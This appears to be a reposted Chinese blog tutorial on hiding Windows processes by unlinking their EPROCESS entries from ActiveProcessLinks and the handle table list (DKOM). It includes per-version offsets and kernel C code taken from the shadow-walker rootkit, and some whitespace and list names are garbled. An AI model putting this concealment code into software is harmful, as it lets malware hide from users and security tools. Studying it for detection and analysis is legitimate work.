在Windows內核中有一個活動進程鏈表AcvtivePeorecssList。它是一個雙向鏈表，保存著系統中所有進程的EPROCESS結構。特別地，進程的EPROCESS結構包含一個具有指針成員FLINK和BLINK的LIST_ENTRY結構,這兩個指針分別指向當前進程的前方和后方進程。當某些模塊需要獲得系統中運行的所有進程信息時，就會遍歷這個鏈表。若在PsActviePoroessList鏈表上刪除了某個進程對象，該進程將被隱藏起來。
EPROCESS的結構可參考http://www.nirsoft.net/kernel_struct/vista/EPROCESS.html。windbg中查看如下:
0:000> dt _EPROCESS
?? +0x000 Pcb????????????? : _KPROCESS
?? +0x06c ProcessLock????? : _EX_PUSH_LOCK
?? +0x070 CreateTime?????? : _LARGE_INTEGER
?? +0x078 ExitTime???????? : _LARGE_INTEGER
?? +0x080 RundownProtect?? : _EX_RUNDOWN_REF
?? +0x084 UniqueProcessId? : Ptr32 Void
?? +0x088 ActiveProcessLinks : _LIST_ENTRY
?? +0x090 QuotaUsage?????? : [3] Uint4B
?? +0x09c QuotaPeak??????? : [3] Uint4B
?? +0x0a8 CommitCharge???? : Uint4B
?? +0x0ac PeakVirtualSize? : Uint4B
?? +0x0b0 VirtualSize????? : Uint4B
?? +0x0b4 SessionProcessLinks : _LIST_ENTRY
?? +0x0bc DebugPort??????? : Ptr32 Void
?? +0x0c0 ExceptionPort??? : Ptr32 Void
?? +0x0c4 ObjectTable????? : Ptr32 _HANDLE_TABLE
?? ......
?? 也就是說每次得到一個ActiveProcessLinks地址，再減去它離EPROCESS結構入口處的偏移，就可以得到EPROCESS的地址，然后就可以輕松得到想要的EPROCESS的任何成員變量！不同的操作系統ActiveProcessLinks的偏移有所不同。
? 要想隱藏某個進程，將其從ActiveProcessLinks鏈表中摘掉并修改前后結點的指向即可，同時修改HandleTableList的指向。shadow-walker上就對HandleTableList鏈表也進行了修改。_HANDLE_TABLE、HandleTableList在不同操作系統中在EPROCESS中便宜也不同。可以通過PsGetVersion獲取系統版本并賦值。具體值可以在windbg中查看。
?ULONG majorVersion;
?ULONG minorVersion;
?// Get the operating system version
?PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );
?if (majorVersion == 4 && minorVersion == 0)
?{
??//DbgPrint("Stop supporting NT 4.0");
??return STATUS_UNSUCCESSFUL;
?}
?else if (majorVersion == 5 && minorVersion == 0)
?{
??//DbgPrint("Microsoft Windows 2000 ");
??*pd_flink = 160;
??*pd_tableoff = 0x128;
??*pd_tablelist = 0x54;
?}
?else if (majorVersion == 5 && minorVersion == 1)
?{
??//DbgPrint("Microsoft Windows XP ");
??*pd_flink = 136;
??*pd_tableoff = 0xc4;
??*pd_tablelist = 0x1c;
?}
?else if (majorVersion == 5 && minorVersion == 2)
?{
??//DbgPrint("Microsoft Windows Server 2003 ");
??*pd_flink = 136;
??*pd_tableoff = 0xc4;//
??*pd_tablelist = 0x1c; //
?}
這種隱藏進程的方法貌似就叫DKOM法，具體原理上個圖看看：

圖中，正常的連接情況如黑線箭頭所示，若要摘除某個結點，修改該結點前后兩個結點的指針即可，修改示意如紅線所示！代碼都是shadow-walker中的，如下
void HideEPROCESSByPrefix(char *p_name, DWORD d_procName, DWORD d_flinkOffset, DWORD d_tableOffset, DWORD d_tableList)
{
?int?? len???????? = 0;
?PLIST_ENTRY plist_active_procs;
?DWORD curr_eproc, eproc;

?
?if (p_name == NULL)
??return;

?len = strlen(p_name);

?eproc = (DWORD) PsGetCurrentProcess();
?curr_eproc = eproc;

?do
?{
??plist_active_procs = (LIST_ENTRY *) (curr_eproc+d_flinkOffset);//get the first ActiveProcessLinks

??if(_strnicmp(p_name, (PVOID)(curr_eproc+d_procName) ,len) == 0)?//cmp the procname if equal hideproc name
??{
???// just Change neighbors
???*((DWORD *)plist_active_procs->Blink) = (DWORD) plist_active_procs->Flink;
???*((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink;

???UnHookHandleListEntry((PEPROCESS)curr_eproc, d_tableOffset, d_tableList);

???// Advance
???curr_eproc = (DWORD) plist_active_procs->Flink;//pointer next ActiveProcessLinks
???curr_eproc = curr_eproc - d_flinkOffset;//ActiveProcessLinks -offset=next _EPROCESS

???// Point to ourselves
???plist_active_procs->Flink = (LIST_ENTRY *) &(plist_active_procs->Flink); // Change the current EPROCESS
???plist_active_procs->Blink = (LIST_ENTRY *) &(plist_active_procs->Flink); // so we don't point to crap
??}
??else
??{
???curr_eproc = (DWORD) plist_active_procs->Flink;??//pointer next ActiveProcessLinks
???curr_eproc = curr_eproc - d_flinkOffset;//ActiveProcessLinks -offset=next _EPROCESS
??}
?} while(eproc != curr_eproc);??//
}

void UnHookHandleListEntry(PEPROCESS eproc, DWORD d_handleTable, DWORD d_handleList)
{
?PLIST_ENTRY plist_hTable = NULL;
?plist_hTable = (PLIST_ENTRY)((*(PDWORD)((DWORD) eproc + d_handleTable)) + d_handleList);

?// Change neighbors because they point fingers
?*((DWORD *)plist_hTable->Blink) = (DWORD) plist_hTable->Flink;
?*((DWORD *)plist_hTable->Flink+1) = (DWORD) plist_hTable->Blink;

?plist_hTable->Flink = (LIST_ENTRY *) &(plist_hTable->Flink); // Change the current LIST_ENTRY
?plist_hTable->Blink = (LIST_ENTRY *) &(plist_hTable->Flink); // so we don't point to crap

}

轉載于:https://www.cnblogs.com/vcerror/p/4289090.html

總結

以上是生活随笔為你收集整理的修改ActiveProcessLinks链表隐藏进程的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。